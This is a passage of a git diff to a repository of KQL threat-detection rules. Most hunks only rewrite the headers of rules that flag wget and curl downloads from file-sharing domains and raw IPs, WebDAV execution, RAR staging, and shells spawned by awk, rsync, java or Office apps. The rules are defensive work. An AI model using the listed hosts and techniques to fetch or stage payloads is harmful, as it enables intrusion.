"mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql
index d47202af..38705676 100644
--- a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql
+++ b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql 
@@ -1,10 +1,10 @@
-// Title: Suspicious File Download From File Sharing Domain Via Wget.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-05
-// Level: high
-// Description: Detects potentially suspicious file downloads from file sharing domains using wget.exe
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Suspicious File Download From File Sharing Domain Via Wget.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: high
+// Description: Detects potentially suspicious file downloads from file sharing domains using wget.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql
index 1bfaf062..02a5cd5d 100644
--- a/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql
+++ b/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious File Download From IP Via Curl.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-07-27
-// Level: high
-// Description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Suspicious File Download From IP Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: high
+// Description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql
index a1aa333b..5680ffe4 100644
--- a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql
+++ b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious File Download From IP Via Wget.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-07-27
-// Level: high
-// Description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Suspicious File Download From IP Via Wget.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: high
+// Description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql
index d11c2d3e..c3745c13 100644
--- a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql
+++ b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious File Download From IP Via Wget.EXE - Paths
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-02-23
-// Level: high
-// Description: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Suspicious File Download From IP Via Wget.EXE - Paths
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: high
+// Description: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Help\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql b/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql
index 97f6799a..4847028b 100644
--- a/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql
+++ b/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious File Execution From Internet Hosted WebDav Share
-// Author: pH-T (Nextron Systems)
-// Date: 2022-09-01
-// Level: high
-// Description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Suspicious File Execution From Internet Hosted WebDav Share
+// Author: pH-T (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " net use http" and ProcessCommandLine contains "& start /b " and ProcessCommandLine contains "\\DavWWWRoot\\") and (ProcessCommandLine contains ".exe " or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".bat " or ProcessCommandLine contains ".vbs " or ProcessCommandLine contains ".ps1 ") and (FolderPath contains "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql b/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql
index 6f4199fb..4731076f 100644
--- a/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql
+++ b/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Greedy Compression Using Rar.EXE
-// Author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022-12-15
-// Level: high
-// Description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Suspicious Greedy Compression Using Rar.EXE
+// Author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-12-15
+// Level: high
+// Description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\rar.exe" or ProcessVersionInfoFileDescription =~ "Command line RAR") or (ProcessCommandLine contains ".exe a " or ProcessCommandLine contains " a -m")) and ((ProcessCommandLine contains " -hp" and ProcessCommandLine contains " -r ") and ((ProcessCommandLine contains " " and ProcessCommandLine contains ":*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\$Recycle.bin\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\PerfLogs\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Temp") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Users\\Public\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Windows\\") or ProcessCommandLine contains " %public%"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_installer_package_child_process.kql b/KQL/rules/Execution/suspicious_installer_package_child_process.kql
index 760de8a1..926df4fa 100644
--- a/KQL/rules/Execution/suspicious_installer_package_child_process.kql
+++ b/KQL/rules/Execution/suspicious_installer_package_child_process.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Installer Package Child Process
-// Author: Sohan G (D4rkCiph3r)
-// Date: 2023-02-18
-// Level: medium
-// Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
-// MITRE Tactic: Execution
-// Tags: attack.t1059, attack.t1059.007, attack.t1071, attack.t1071.001, attack.execution, attack.command-and-control
-// False Positives:
-// - Legitimate software uses the scripts (preinstall, postinstall)
-
-DeviceProcessEvents
+// Title: Suspicious Installer Package Child Process
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-02-18
+// Level: medium
+// Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
+// MITRE Tactic: Execution
+// Tags: attack.t1059, attack.t1059.007, attack.t1071, attack.t1071.001, attack.execution, attack.command-and-control
+// False Positives:
+// - Legitimate software uses the scripts (preinstall, postinstall)
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "preinstall" or ProcessCommandLine contains "postinstall") and (FolderPath endswith "/sh" or FolderPath endswith "/bash" or FolderPath endswith "/dash" or FolderPath endswith "/python" or FolderPath endswith "/ruby" or FolderPath endswith "/perl" or FolderPath endswith "/php" or FolderPath endswith "/javascript" or FolderPath endswith "/osascript" or FolderPath endswith "/tclsh" or FolderPath endswith "/curl" or FolderPath endswith "/wget") and (InitiatingProcessFolderPath endswith "/package_script_service" or InitiatingProcessFolderPath endswith "/installer")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql b/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql
index 53894525..723776e6 100644
--- a/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql
+++ b/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious Interactive PowerShell as SYSTEM
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-12-07
-// Level: high
-// Description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-// False Positives:
-// - Administrative activity
-// - PowerShell scripts running as SYSTEM user
-
-DeviceFileEvents
+// Title: Suspicious Interactive PowerShell as SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-07
+// Level: high
+// Description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Administrative activity
+// - PowerShell scripts running as SYSTEM user
+
+DeviceFileEvents
 | where FolderPath in~ ("C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt", "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-Interactive")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql b/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql
index 7806dd0d..b531df6b 100644
--- a/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql
+++ b/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql
@@ -1,11 +1,11 @@
-// Title: Suspicious Invocation of Shell via AWK - Linux
-// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
-// Date: 2024-09-02
-// Level: high
-// Description: Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function.
-// This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Suspicious Invocation of Shell via AWK - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function.
+// This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains "BEGIN {system" and (FolderPath endswith "/awk" or FolderPath endswith "/gawk" or FolderPath endswith "/mawk" or FolderPath endswith "/nawk"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql b/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql
index 063c5e3f..790c440a 100644
--- a/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql
+++ b/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Invocation of Shell via Rsync
-// Author: Florian Roth
-// Date: 2025-01-18
-// Level: high
-// Description: Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, attack.t1203
-
-DeviceProcessEvents
+// Title: Suspicious Invocation of Shell via Rsync
+// Author: Florian Roth
+// Date: 2025-01-18
+// Level: high
+// Description: Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.t1203
+
+DeviceProcessEvents
 | where ((FolderPath endswith "/ash" or FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/tcsh" or FolderPath endswith "/zsh") and (InitiatingProcessFolderPath endswith "/rsync" or InitiatingProcessFolderPath endswith "/rsyncd")) and (not(ProcessCommandLine contains " -e "))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_java_children_processes.kql b/KQL/rules/Execution/suspicious_java_children_processes.kql
index b8db8b0d..9297fe2c 100644
--- a/KQL/rules/Execution/suspicious_java_children_processes.kql
+++ b/KQL/rules/Execution/suspicious_java_children_processes.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Java Children Processes
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-03
-// Level: high
-// Description: Detects java process spawning suspicious children
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Suspicious Java Children Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-03
+// Level: high
+// Description: Detects java process spawning suspicious children
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "dash" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "zsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "fish" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "python") and InitiatingProcessFolderPath endswith "/java"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql b/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql
index 79d8a015..a29c8335 100644
--- a/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql
+++ b/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Microsoft Office Child Process - MacOS
-// Author: Sohan G (D4rkCiph3r)
-// Date: 2023-01-31
-// Level: high
-// Description: Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, attack.t1059.002, attack.t1137.002, attack.t1204.002
-
-DeviceProcessEvents
+// Title: Suspicious Microsoft Office Child Process - MacOS
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-01-31
+// Level: high
+// Description: Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059.002, attack.t1137.002, attack.t1204.002
+
+DeviceProcessEvents
 | where (FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/osacompile" or FolderPath endswith "/osascript" or FolderPath endswith "/sh" or FolderPath endswith "/zsh" or FolderPath endswith "/python" or FolderPath endswith "/python3" or FolderPath endswith "/wget") and (InitiatingProcessFolderPath contains "Microsoft Word" or InitiatingProcessFolderPath contains "Microsoft Excel" or InitiatingProcessFolderPath contains "Microsoft PowerPoint" or InitiatingProcessFolderPath contains "Microsoft OneNote")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql b/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql
index 9c19282b..a3092b25 100644
--- a/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql
+++ b/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Mshta.EXE Execution Patterns
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-07-17
-// Level: high
-// Description: Detects suspicious mshta process execution patterns
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1106
-
-DeviceProcessEvents
+// Title: Suspicious Mshta.EXE Execution Patterns
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-07-17
+// Level: high
+// Description: Detects suspicious mshta process execution patterns
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1106
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and ((ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))) or ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and (not(((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\") or (ProcessCommandLine contains ".htm" or ProcessCommandLine contains ".hta") or (ProcessCommandLine endswith "mshta.exe" or ProcessCommandLine endswith "mshta")))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_nohup_execution.kql b/KQL/rules/Execution/suspicious_nohup_execution.kql
index 54098102..8d84b7b3 100644
--- a/KQL/rules/Execution/suspicious_nohup_execution.kql
+++ b/KQL/rules/Execution/suspicious_nohup_execution.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Nohup Execution
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-06-02
-// Level: high
-// Description: Detects execution of binaries located in potentially suspicious locations via "nohup"
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Suspicious Nohup Execution
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: high
+// Description: Detects execution of binaries located in potentially suspicious locations via "nohup"
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/tmp/" and FolderPath endswith "/nohup"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_outlook_child_process.kql b/KQL/rules/Execution/suspicious_outlook_child_process.kql
index cb6d6729..8a7a7cf6 100644
--- a/KQL/rules/Execution/suspicious_outlook_child_process.kql
+++ b/KQL/rules/Execution/suspicious_outlook_child_process.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Outlook Child Process
-// Author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team
-// Date: 2022-02-28
-// Level: high
-// Description: Detects a suspicious process spawning from an Outlook process.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.002
-
-DeviceProcessEvents
+// Title: Suspicious Outlook Child Process
+// Author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team
+// Date: 2022-02-28
+// Level: high
+// Description: Detects a suspicious process spawning from an Outlook process.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+
+DeviceProcessEvents
